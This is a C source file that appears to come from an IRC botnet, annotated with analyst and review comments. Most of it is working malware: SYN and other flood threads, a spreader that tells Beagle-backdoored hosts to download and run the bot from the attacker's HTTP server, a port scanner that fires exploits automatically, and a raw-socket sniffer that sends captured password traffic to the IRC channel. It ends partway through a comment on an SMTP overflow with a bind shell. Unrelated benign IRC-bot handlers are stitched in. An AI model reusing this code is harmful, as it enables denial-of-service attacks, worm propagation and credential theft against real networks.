/*
 * Enumerate the SMB shares of ServerName (SHARE_INFO_502, via the
 * dynamically resolved fNetShareEnum) and post one line per share to the
 * IRC channel: net name, path, current use count and whether the share's
 * security descriptor validates.  Paging is driven by ERROR_MORE_DATA.
 *
 * Returns TRUE only when the last enumeration call ended with ERROR_SUCCESS;
 * any other status is reported on the channel as "[NET]: Share list error".
 *
 * Analyst note: this is host reconnaissance reported to the controller.  The
 * fixed header "Share name: Resource: Uses: Desc:" and the "[NET]:" prefix
 * are recognisable on the IRC channel.  sprintf() writes unbounded %S
 * share names/paths into an IRCLINE buffer — presumably IRCLINE is large
 * enough for the platform limits; not verified here.
 */
BOOL ListShares(SOCKET sock, char *chan, BOOL notice, char *ServerName)
{
    char buffer[IRCLINE];
    PSHARE_INFO_502 pBuf, p;
    NET_API_STATUS nStatus;
    LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);
    DWORD entriesread = 0, totalread = 0, resume = 0;

    irc_privmsg(sock, chan, "Share name: Resource: Uses: Desc:", notice);
    do {
        /* -1 = MAX_PREFERRED_LENGTH: let the API allocate the whole page */
        nStatus = fNetShareEnum(wServerName, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
        if (nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
            p = pBuf;
            for (unsigned int i = 1; i <= entriesread; i++) {
                sprintf(buffer, "%-14S %-24S %-6u %-4s", p->shi502_netname, p->shi502_path, p->shi502_current_uses, IsVSD(fIsValidSecurityDescriptor(p->shi502_security_descriptor)));
                irc_privmsg(sock, chan, buffer, notice, TRUE);
                p++;
            }
            fNetApiBufferFree(pBuf);
        } else {
            sprintf(buffer, "[NET]: Share list error: %s <%ld>", NasError(nStatus), nStatus);
            irc_privmsg(sock, chan, buffer, notice);
        }
    } while (nStatus == ERROR_MORE_DATA);

    if (nStatus != ERROR_SUCCESS) return FALSE;
    return TRUE;
}
/*
 * Thread entry for the "findfile" command: walks ffind.dirname for
 * ffind.filename via FindFile() and reports the number of hits.
 *
 * param points at an FFIND block owned by the spawner.  The block is copied
 * to the stack first and gotinfo is then set TRUE, which is the signal that
 * the spawner may reuse or discard the original (see the cgotinfo wait loop
 * in AdvScanner for the other side of this handshake).
 *
 * The thread never returns; it retires its slot with clearthread() and
 * calls ExitThread(0).
 *
 * NOTE(review): the trailing-backslash strip indexes strlen()-1, so an empty
 * dirname would index before the array — presumably callers never pass one.
 */
DWORD WINAPI FindFileThread(LPVOID param)
{
    FFIND ffind = *((FFIND *)param);
    FFIND *ffinds = (FFIND *)param;
    ffinds->gotinfo = TRUE;
    char sendbuf[IRCLINE];
    unsigned int numfound = 0;

    /* drop a trailing path separator so FindFile() can append its own */
    if (ffind.dirname[strlen(ffind.dirname)-1] == '\\') ffind.dirname[strlen(ffind.dirname)-1] = '\0';

    _snprintf(sendbuf, sizeof(sendbuf), "[FINDFILE]: Searching for file: %s.", ffind.filename);
    if (!ffind.silent) irc_privmsg(ffind.sock, ffind.chan, sendbuf, ffind.notice);

    numfound = FindFile(ffind.sock, ffind.chan, ffind.notice, ffind.filename, ffind.dirname, numfound);

    sprintf(sendbuf, "[FINDFILE]: Files found: %d.", numfound);
    if (!ffind.silent) irc_privmsg(ffind.sock, ffind.chan, sendbuf, ffind.notice);
    addlog(sendbuf);

    clearthread(ffind.threadnum);
    ExitThread(0);
}
/*
 * Thread entry for the "wonk" flood.  Copies the WONK parameter block,
 * acknowledges it through gotinfo, runs SendPhatWonk() against wonk.ip with
 * the textual length/delay converted by atoi(), then posts the completion
 * line (with the ports SendPhatWonk reports) to IRC and the log.
 *
 * Never returns: the thread slot is released with clearthread() and the
 * thread ends via ExitThread(0).
 *
 * Analyst note: the IRC-visible artifact is the "-wonk- Done with flood,
 * ports hit:" line (the \x03/\2 bytes are mIRC colour/bold codes).
 */
DWORD WINAPI WonkThread(LPVOID param)
{
    char sendbuf[IRCLINE];
    WONK wonk = *((WONK *)param);
    WONK *wonks = (WONK *)param;
    wonks->gotinfo = TRUE;

    sprintf(sendbuf, "-\x03\x34\2wonk\2\x03- Done with flood, ports hit: %s", SendPhatWonk(finet_addr(wonk.ip), atoi(wonk.length), atoi(wonk.delay)));
    if (!wonk.silent) irc_privmsg(wonk.sock, wonk.chan, sendbuf, wonk.notice);
    addlog(sendbuf);

    clearthread(wonk.threadnum);
    ExitThread(0);
}
/*
 * Thread entry for the "supersyn" flood.  Same shape as the other flood
 * threads in this file: copy the SUPERSYN block, set gotinfo, run
 * SuperSyn(ip, port, length) — which returns a KB/sec figure — and report.
 *
 * Never returns (clearthread + ExitThread).
 *
 * Analyst note: the "[SUPERSYN]: Done with flood" completion line is the
 * IRC-visible artifact; the digits around it are colour-code remnants.
 */
DWORD WINAPI SuperSynThread(LPVOID param)
{
    char sendbuf[IRCLINE];
    SUPERSYN supersyn = *((SUPERSYN *)param);
    SUPERSYN *supersyns = (SUPERSYN *)param;
    supersyns->gotinfo = TRUE;

    sprintf(sendbuf, "4<<12[SUPERSYN]: Done with flood (%iKB/sec)4>>", SuperSyn(supersyn.ip, supersyn.port, supersyn.length));
    if (!supersyn.silent) irc_privmsg(supersyn.sock, supersyn.chan, sendbuf, supersyn.notice);
    addlog(sendbuf);

    clearthread(supersyn.threadnum);
    ExitThread(0);
}
/*
 * Thread entry for the "skysyn" flood: copy the SKYSYN block, acknowledge
 * via gotinfo, run SkySyn(ip, port, length) and report its KB/sec result on
 * IRC and in the log.  Never returns (clearthread + ExitThread).
 */
DWORD WINAPI SkySynThread(LPVOID param)
{
    char sendbuf[IRCLINE];
    SKYSYN skysyn = *((SKYSYN *)param);
    SKYSYN *skysyns = (SKYSYN *)param;
    skysyns->gotinfo = TRUE;

    sprintf(sendbuf, "-\x03\x34\2skysyn\2\x03- Done with flood (%iKB/sec)", SkySyn(skysyn.ip, skysyn.port, skysyn.length));
    if (!skysyn.silent) irc_privmsg(skysyn.sock, skysyn.chan, sendbuf, skysyn.notice);
    addlog(sendbuf);

    clearthread(skysyn.threadnum);
    ExitThread(0);
}
/*
 * Thread entry for the plain SYN flood: copy the SYNFLOOD block, acknowledge
 * via gotinfo, run SynFlood(ip, port, length) and report "[SYN]: Done with
 * flood" with the KB/sec figure.  Never returns (clearthread + ExitThread).
 */
DWORD WINAPI SynFloodThread(LPVOID param)
{
    char sendbuf[IRCLINE];
    SYNFLOOD synflood = *((SYNFLOOD *)param);
    SYNFLOOD *synfloods = (SYNFLOOD *)param;
    synfloods->gotinfo = TRUE;

    sprintf(sendbuf, "[SYN]: Done with flood (%iKB/sec).", SynFlood(synflood.ip, synflood.port, synflood.length));
    if (!synflood.silent) irc_privmsg(synflood.sock, synflood.chan, sendbuf, synflood.notice);
    addlog(sendbuf);

    clearthread(synflood.threadnum);
    ExitThread(0);
}
/*
 * Spreader that piggybacks on a host already carrying a Beagle/Bagle
 * backdoor: connect to exinfo.ip:exinfo.port, send one of two auth strings
 * (chosen by whether exinfo.command is "beagle1"), read the 8-byte reply,
 * then send the URL of this bot's own executable served from its HTTP port
 * (http://<our ip>:<httpport>/<exe name>) so the backdoor fetches and runs it.
 *
 * On success the "[<exploit>]: Exploiting IP:" line is posted and
 * exploit[].stats is incremented.  Returns the success flag.
 *
 * Analyst notes: the observable sequence is an outbound TCP connection to
 * the backdoor port followed by an inbound HTTP request from the victim to
 * this host on httpport for a file named after the running executable.
 * fclosesocket()/fWSACleanup() run even when fsocket() failed.
 */
BOOL Beagle(EXINFO exinfo)
{
    char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
    BOOL success = FALSE;
    WSADATA WSAData;

    if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) return FALSE;

    SOCKET sSock;
    if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family = AF_INET;
        ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
        ssin.sin_port = fhtons(exinfo.port);
        if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
            BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
            if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
                if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
                    /* own executable name (no directory) for the download URL */
                    GetModuleFileName(0, botfile, sizeof(botfile));
                    _splitpath(botfile, NULL, NULL, fname, ext);
                    _snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
                    _snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
                    if(fsend(sSock, buffer, sizeof(buffer), 0)) success = TRUE;
                }
            }
        }
    }
    fclosesocket(sSock);
    fWSACleanup();

    if (success) {
        _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
        if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
        addlog(buffer);
        exploit[exinfo.exploit].stats++;
    }
    return (success);
}
/*
 * Stop one or all bot threads of a given kind and report the outcome.
 *
 * threadid selects the thread type; `thread`, when non-NULL, is the textual
 * number of a single thread to stop (atoi, so non-numeric text means 0 =
 * all threads of that type, as killthreadid() interprets it — presumably;
 * confirm against killthreadid).  name/desc are only used to build the
 * reply line.  Reports on IRC unless silent, and always writes the log.
 */
void stopthread(SOCKET sock, char *chan, BOOL notice, BOOL silent, char *name, char *desc, int threadid, char *thread)
{
    char sendbuf[IRCLINE];
    int threadnum=0, i;

    if(thread) threadnum=atoi(thread);

    if ((i=killthreadid(threadid,threadnum)) > 0) sprintf(sendbuf,"%s: %s stopped. (%d thread(s) stopped.)", name, desc, i);
    else sprintf(sendbuf,"%s: No %s thread found.", name, desc);

    if (!silent) irc_privmsg(sock,chan,sendbuf,notice);
    addlog(sendbuf);
    return;
}
/*
 * Route a PRIVMSG to the bot's command handlers.
 *
 * Only channel messages (chan starts with '#') that begin with
 * "<IRC_NICK>: " are treated as commands.  "record <args>" and
 * "records <args>" dispatch to their handlers; any other addressed
 * channel message gets the canned brush-off.  Everything else is ignored.
 * Always returns true.
 */
static bool handle_privmsg(int fd, struct ircmsg_privmsg *msg)
{
    const size_t nick_len = strlen(IRC_NICK);
    bool addressed  = strncmp(msg->text, IRC_NICK ": ", nick_len + 2) == 0;
    bool in_channel = msg->chan[0] == '#';

    if (!addressed || !in_channel)
        return true;

    /* skip the "<nick>: " prefix */
    char *args = msg->text + nick_len + 2;

    if (strncmp(args, "record ", 7) == 0)
        handle_cmd_record(fd, msg, args + 7);
    else if (strncmp(args, "records ", 8) == 0)
        handle_cmd_records(fd, msg, args + 8);
    else
        irc_privmsg(fd, msg->chan, "%s: shut the f**k up.", msg->name.nick);

    return true;
}
/*
 * Report the address the scanner thread `threadnum` is currently at.
 * If no SCAN_THREAD is registered, reports "Scan not active." instead.
 * The line is prefixed with mn_title and always written to the log.
 *
 * NOTE(review): advinfo[threadnum] is read without checking that threadnum
 * belongs to an active scan thread — presumably the caller validates it.
 */
void currentIP(SOCKET sock, char *chan, BOOL notice, int threadnum)
{
    char sendbuf[IRCLINE];

    if (findthreadid(SCAN_THREAD) > 0) {
        IN_ADDR in;
        in.s_addr = advinfo[threadnum].ip;
        sprintf(sendbuf, "%s Current IP: %s",mn_title,finet_ntoa(in));
    } else sprintf(sendbuf ,"%s Scan not active.",mn_title);

    irc_privmsg(sock, chan, sendbuf, notice);
    addlog(sendbuf);
    return;
}
/*
 * Thread entry for the generic "ddos" command: copy the DDOST block,
 * acknowledge via gotinfo, reseed rand() from the tick count, run
 * DDOSAttack(ip, port, type, length) and report its KB/sec figure as
 * "[DDoS]: Done with flood".  Never returns (clearthread + ExitThread).
 *
 * Note the IRC socket field of DDOST is named `socket`, unlike the `sock`
 * field used by the other parameter blocks in this file.
 */
DWORD WINAPI DDOSThread(LPVOID param)
{
    char sendbuf[IRCLINE];
    DDOST ddos = *((DDOST *)param);
    DDOST *ddoss = (DDOST *)param;
    ddoss->gotinfo = TRUE;

    srand(GetTickCount());

    sprintf(sendbuf, "[DDoS]: Done with flood (%iKB/sec).", DDOSAttack(ddos.ip, ddos.port, ddos.type, ddos.length));
    if (!ddos.silent) irc_privmsg(ddos.socket, ddos.chan, sendbuf, ddos.notice);
    addlog(sendbuf);

    clearthread(ddos.threadnum);
    ExitThread(0);
}
/*
 * Post a one-line summary of per-exploit hit counters ("[name]: n," for
 * every entry of exploit[] up to the port==0 terminator) followed by the
 * total and the bot uptime.  The line goes to IRC and to the log.
 *
 * NOTE(review): strncat()'s third argument is the number of bytes it may
 * append, not the size of the destination, so sizeof(buffer) does not bound
 * the concatenation; with many exploit entries the line can exceed IRCLINE.
 */
void ListExploitStats(SOCKET sock, char *chan, BOOL notice)
{
    char buffer[IRCLINE], buffer2[IRCLINE];
    int extotal = 0;

    sprintf(buffer, "%s",mn_title);
    for(int i=0; exploit[i].port != 0; i++) {
        extotal += exploit[i].stats;
        sprintf(buffer2,"[%s]: %d,",exploit[i].name,exploit[i].stats);
        strncat(buffer, buffer2, sizeof(buffer));
    }
    sprintf(buffer2, "Total: %d in %s", extotal, Uptime(started));
    strncat(buffer, buffer2, sizeof(buffer));

    irc_privmsg(sock, chan, buffer, notice);
    addlog(buffer);
    return;
}
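/*
 * "hello" responder: when a PRIVMSG (after the bot's nick is skipped)
 * matches one of helloinfo.trigger[], answer with a random entry of
 * helloinfo.reply[].
 *
 * Rate limit: nothing is considered until helloinfo.interval seconds have
 * passed since helloinfo.last.  Odds: a matching trigger is answered only
 * when rrand(helloinfo.odds) rolls 0; any other roll abandons the message.
 *
 * Returns 1 when a trigger matched but the odds roll suppressed the reply,
 * 0 in every other case (nothing matched, rate-limited, or a reply was sent).
 *
 * NOTE(review): the original declared an unused `j`; it is dropped here.
 * The loop does not stop after a reply, so a text matching several triggers
 * may be answered more than once — kept as-is because the intent is unclear.
 */
int reply(info_t * in)
{
    time_t now = time(NULL);

    if (helloinfo.last + helloinfo.interval > now)
        return 0;
    if (in->cmd != cmd_privmsg)
        return 0;

    in->tail = skip_nick(in->tail, in->me);
    for (int i = 0; i < helloinfo.ntrigger; i++) {
        /* regex() returning 0 is treated as "matched" — confirm against regex() */
        if (regex(in->tail, helloinfo.trigger[i]))
            continue;
        if (rrand(helloinfo.odds) > 0)
            return 1;
        irc_privmsg(to_sender(in), "%s", helloinfo.reply[rrand(helloinfo.nreply)]);
        helloinfo.last = now;
    }
    return 0;
}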
/*
 * Thread entry for the "ftptrans" command: open a WinINet FTP session to
 * ftptrans.host with the supplied credentials (passive mode) and either
 * download remote->local (ftptrans.get) or upload local->remote.
 * The outcome line is posted to IRC unless silent and always logged; the
 * thread then closes the handle, frees its slot and exits.
 *
 * NOTE(review): on failure the string returned by PrintError() is passed to
 * _snprintf as the format argument rather than as a "%s" parameter, so any
 * '%' in that text is interpreted as a conversion.
 * fInternetCloseHandle() is also called when IntConn is NULL.
 */
DWORD WINAPI FtpTransThread(LPVOID param)
{
    char sendbuf[IRCLINE];
    FTPTRANS ftptrans = *((FTPTRANS *)param);
    FTPTRANS *ftptranss = (FTPTRANS *)param;
    ftptranss->gotinfo = TRUE;

    HANDLE IntConn = fInternetConnect(ih, ftptrans.host, INTERNET_DEFAULT_FTP_PORT, ftptrans.username, ftptrans.password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0);
    Sleep(1000);

    if (IntConn) {
        if (ftptrans.get) {
            if (fFtpGetFile(IntConn, ftptrans.remote, ftptrans.local, FALSE, FILE_ATTRIBUTE_NORMAL, FTP_TRANSFER_TYPE_UNKNOWN | INTERNET_FLAG_RELOAD, 0))
                _snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Successful download of: %s/%s to: %s.", ftptrans.host, ftptrans.remote, ftptrans.local);
            else
                _snprintf(sendbuf,sizeof(sendbuf),PrintError("[FTPTRANS]:"));
        } else {
            if (fFtpPutFile(IntConn, ftptrans.local, ftptrans.remote, FTP_TRANSFER_TYPE_UNKNOWN, 0))
                _snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Successful upload of: %s to: %s/%s.", ftptrans.local, ftptrans.host, ftptrans.remote);
            else
                _snprintf(sendbuf,sizeof(sendbuf),PrintError("[FTPTRANS]:"));
        }
    } else
        _snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Error: Failed to connect (invalid hostname or user account).");

    if (!ftptrans.silent) irc_privmsg(ftptrans.sock,ftptrans.chan,sendbuf,ftptrans.notice);
    addlog(sendbuf);

    fInternetCloseHandle(IntConn);
    clearthread(ftptrans.threadnum);
    ExitThread(0);
}
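/*
 * Route a PRIVMSG to the bot's command handlers.
 *
 * Only channel messages (chan starts with '#') that begin with the full
 * "<IRC_NICK>: " prefix are treated as commands; "help", "record <args>"
 * and "records <args>" dispatch to their handlers and return whatever the
 * handler returns.  Any other addressed channel message gets the canned
 * brush-off.  Everything else is ignored with true.
 *
 * Fixes relative to the previous version: the handler calls referenced an
 * undefined `head` (the pointer is `cmd`), and the prefix test compared
 * only the nick, so a message from a nick that merely starts with ours —
 * or a bare mention without ": " — would have been parsed as a command
 * while cmd was still advanced past the assumed ": ".
 */
static bool handle_privmsg(int fd, struct ircmsg_privmsg *msg)
{
    static const char prefix[] = IRC_NICK ": ";
    const size_t prefix_len = sizeof(prefix) - 1;

    // Only handle messages addressed to the bot with the full "<nick>: " prefix.
    if (strncmp(msg->text, prefix, prefix_len) != 0)
        return true;
    // Only handle messages in a channel.
    if (msg->chan[0] != '#')
        return true;

    char *cmd = msg->text + prefix_len;

    if (BeginsWith(cmd, "help"))
        return handle_cmd_help(fd, msg, cmd + 4);
    if (BeginsWith(cmd, "record "))
        return handle_cmd_record(fd, msg, cmd + 7);
    if (BeginsWith(cmd, "records "))
        return handle_cmd_records(fd, msg, cmd + 8);

    irc_privmsg(fd, msg->chan, "%s: shut the f**k up.", msg->name.nick);
    return true;
}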
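/*
 * "fortune" responder: on a PRIVMSG whose text (after the bot's nick) is
 * the "fortune" command, send a random line from the fortune source to the
 * sender, at most once every req_delay seconds (tracked in lasttime).
 * While the cooldown is active the requester is told, via NOTICE, how long
 * to wait, in hours, minutes or seconds.
 *
 * Always returns 0.
 *
 * Fix relative to the previous version: time() was sampled three times
 * (cooldown check, lasttime update, remaining-time calculation), so the
 * values could disagree across a second boundary; it is now read once.
 */
int reply(info_t * in)
{
    char buf[512];

    if (in->cmd != cmd_privmsg)
        return 0;

    in->tail = skip_nick(in->tail, in->me);
    /* tail_cmd() == 0 means the command matched — same test as before */
    if (tail_cmd(&in->tail, "fortune") != 0)
        return 0;
    if (randomline(buf, sizeof(buf)) == NULL)
        return 0;

    time_t now = time(NULL);
    if (now - lasttime >= req_delay) {
        irc_privmsg(to_sender(in), "%s", buf);
        lasttime = now;
        return 0;
    }

    int remain = req_delay - (now - lasttime);
    if (remain > 3600)
        irc_notice(in->sender_nick, "Please wait %d hours.", remain / 3600);
    else if (remain > 60)
        irc_notice(in->sender_nick, "Please wait %d minutes.", remain / 60);
    else
        irc_notice(in->sender_nick, "Please wait %d seconds.", remain);
    return 0;
}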
/*
 * Controller thread for the "advscan" command.  Copies the ADVSCAN block,
 * records the starting address in advinfo[], runs CheckServers(), and — if
 * this is the only scan thread — (re)initialises the shared CriticalSection
 * used by the workers.  It then launches scan.threads AdvPortScanner
 * workers, each registered as a SCAN_THREAD child of this thread, and waits
 * either scan.minutes minutes or until advinfo[].info is cleared.
 * Finally it reports "<sc_title> Finished at ..." and retires.
 *
 * Returns 0 only on the critical-section failure path; otherwise the thread
 * ends via ExitThread(0).
 *
 * Analyst notes: every worker is handed a pointer to the same stack copy
 * `scan`, and the spawner waits on scan.cgotinfo before moving on — that
 * flag is never reset between iterations here, so later workers may start
 * from a block that is already being modified (presumed race, not verified).
 */
DWORD WINAPI AdvScanner(LPVOID param)
{
    char buffer[LOGLINE];
    ADVSCAN scan = *((ADVSCAN *)param);
    ADVSCAN *scanp = (ADVSCAN *)param;
    scanp->gotinfo = TRUE;

    advinfo[scan.threadnum].ip = finet_addr(scan.ip);
    CheckServers(scan);

    if (findthreadid(SCAN_THREAD) == 1) {
        DeleteCriticalSection(&CriticalSection); // just in case
        if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
            sprintf(buffer,"Failed to initialize critical section.");
            if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
            addlog(buffer);
            return 0;
        }
    }

    advinfo[scan.threadnum].info = TRUE;
    for (unsigned int i=1;i<=(scan.threads);i++) {
        scan.cthreadid = i;
        sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
        scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
        threads[scan.cthreadnum].parent = scan.threadnum;
        /* assignment in the condition is intentional: stores and tests the handle */
        if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
            while (scan.cgotinfo == FALSE) Sleep(30);
        } else {
            sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError());
            addlog(buffer);
        }
        Sleep(30);
    }

    /* run for a fixed time, or until something clears advinfo[].info */
    if (scan.minutes != 0) Sleep(60000*scan.minutes);
    else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);

    IN_ADDR in;
    in.s_addr = advinfo[scan.threadnum].ip;
    sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes);
    if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
    addlog(buffer);

    advinfo[scan.threadnum].info = FALSE;
    Sleep(3000);
    if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection);
    clearthread(scan.threadnum);
    ExitThread(0);
}
/*
 * Worker thread spawned by AdvScanner.  Copies the shared ADVSCAN block and
 * sets cgotinfo so the controller can move on.  While the parent's
 * advinfo[].info flag is set it takes the next address (sequential or
 * random), probes scan.port with AdvPortOpen(), and on an open port either
 * reports "IP: x, Port n is open." (scan.exploit == -1) or fills an EXINFO
 * and hands it to exploit[scan.exploit].exfunc().  Sleeps 2 s per address.
 * Never returns (clearthread + ExitThread).
 *
 * Analyst notes: the rate is one probe per worker every 2 s plus the
 * AdvPortOpen() delay; reports go to scan.msgchan when set, else scan.chan.
 * Several sprintf() calls use a non-literal first argument (logbuf, the
 * exploit command, channel names) — a '%' in those would be interpreted.
 * The CriticalSection only serialises the report path, not the exploit path.
 */
DWORD WINAPI AdvPortScanner(LPVOID param)
{
    IN_ADDR in;
    char logbuf[LOGLINE];
    ADVSCAN scan = *((ADVSCAN *)param);
    ADVSCAN *scanp = (ADVSCAN *)param;
    scanp->cgotinfo = TRUE;
    int threadnum=scan.cthreadnum;
    int threadid=scan.cthreadid;

    srand(GetTickCount());

    while (advinfo[threads[threadnum].parent].info) {
        DWORD dwIP;
        if (scan.random) dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
        else dwIP = AdvGetNextIP(threads[threadnum].parent);
        in.s_addr = dwIP;

        /* thread-list entry shows the address currently being probed */
        sprintf(logbuf,"IP: %s:%d, Scan thread: %d, Sub-thread: %d.", finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
        sprintf(threads[threadnum].name, logbuf);

        if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
            if (scan.exploit == -1) {
                EnterCriticalSection(&CriticalSection);
                sprintf(logbuf,"IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
                if (!scan.silent) {
                    if (scan.msgchan[0] != '\0') irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
                    else irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
                }
                addlog(logbuf);
                LeaveCriticalSection(&CriticalSection);
            } else {
                EXINFO exinfo;
                sprintf(exinfo.ip, finet_ntoa(in));
                sprintf(exinfo.command, exploit[scan.exploit].command);
                if (scan.msgchan[0] != '\0') sprintf(exinfo.chan, scan.msgchan);
                else sprintf(exinfo.chan, scan.chan);
                exinfo.sock = scan.sock;
                exinfo.notice = scan.notice;
                exinfo.silent = scan.silent;
                exinfo.port = scan.port;
                exinfo.threadnum = threadnum;
                exinfo.exploit = scan.exploit;
                exploit[scan.exploit].exfunc(exinfo);
            }
        }
        Sleep(2000);
    }

    clearthread(threadnum);
    ExitThread(0);
}
/*
 * Thread entry for the "psniff" command: a promiscuous raw-IP capture on
 * the interface whose address GetIP(sniff.sock) reports, enabled with the
 * SIO_RCVALL ioctl.  For every TCP segment (ip->proto == 6) whose flag byte
 * is exactly 24 (PSH|ACK, i.e. a data-bearing segment) the payload is
 * searched for each pswords[].text keyword; the first hit is reported as
 * "[PSNIFF]: Suspicious <type> packet from: a:p to: b:q - <payload>".
 * Payloads that already contain "[PSNIFF]" are skipped so the bot does not
 * report its own IRC traffic.  Runs until recv() fails, then retires.
 * Never returns (clearthread + ExitThread).
 *
 * Analyst notes: host artefact is a raw socket with SIO_RCVALL set (needs
 * administrative rights); the captured payload text is exfiltrated to the
 * IRC channel and also written to the log and stdout.  strstr() relies on
 * the per-iteration memset() for termination, so a packet that fills all
 * 65535 bytes would leave the buffer unterminated.  Both addresses are
 * formatted in one sprintf call through finet_ntoa(); if that wraps
 * inet_ntoa() (static buffer) the report shows the same address twice —
 * presumed, not verified.
 */
DWORD WINAPI SniffThread(LPVOID param)
{
    char sendbuf[IRCLINE], rawdata[65535], *Packet;
    int i;
    DWORD dwRet, dwMode = 1;
    PSNIFF sniff = *((PSNIFF *)param);
    PSNIFF *sniffs = (PSNIFF *)param;
    sniffs->gotinfo = TRUE;
    IPHEADER *ip;
    TCPHEADER *tcp;
    IN_ADDR sia, dia;
    SOCKET sniffsock;
    SOCKADDR_IN ssin;

    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family = AF_INET;
    ssin.sin_port = fhtons(0);
    ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));

    if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
        sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
        if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
        addlog(sendbuf);
        clearthread(sniff.threadnum);
        ExitThread(0);
    }
    threads[sniff.threadnum].sock = sniffsock;

    if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
        sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
        if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
        addlog(sendbuf);
        fclosesocket(sniffsock);
        clearthread(sniff.threadnum);
        ExitThread(0);
    }

    /* SIO_RCVALL: deliver all IP traffic seen on this interface */
    if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
        sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
        if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
        addlog(sendbuf);
        fclosesocket(sniffsock);
        clearthread(sniff.threadnum);
        ExitThread(0);
    }

    while(1) {
        memset(rawdata, 0, sizeof(rawdata));
        Packet = (char *)rawdata;
        if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
            _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
            addlog(sendbuf);
            break;
        }
        ip = (IPHEADER *)Packet;
        if (ip->proto == 6) {
            Packet += sizeof(*ip);
            tcp = (TCPHEADER *)Packet;
            sia.S_un.S_addr = ip->sourceIP;
            dia.S_un.S_addr = ip->destIP;
            if (tcp->flags == 24) {
                Packet += sizeof(*tcp);
                if (strstr(Packet, "[PSNIFF]") == NULL) {
                    for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
                        if (strstr(Packet, pswords[i].text)) {
                            _snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s", ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
                            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
                            printf("%s\n",sendbuf);
                            addlog(sendbuf);
                            break;
                        }
                    }
                }
            }
        }
    }

    fclosesocket(sniffsock);
    clearthread(sniff.threadnum);
    ExitThread(0);
}
/*
 * Thread body for the Ipswitch IMail SMTP "RCPT TO" overflow.  param is a
 * struct exploits block that is copied out and acknowledged via gotinfo;
 * target is the IRC destination for the success report; host is resolved
 * with gethostbyname() and used with exploit.port.
 *
 * Flow: connect, wait for a "220" banner, send "EHLO" and "MAIL FROM",
 * then a single RCPT TO line built from Exp, four of the address constants
 * below, NOP padding sized so the whole thing lands at a fixed length,
 * StackS and the Win32Bind payload (defined elsewhere; presumably a bind
 * shell, given the later shell_connect() to port 6236 — confirm).  The
 * connection is reopened once to check for a banner, shell_connect() is
 * called, and the success line is sent before _endthreadex(0).
 *
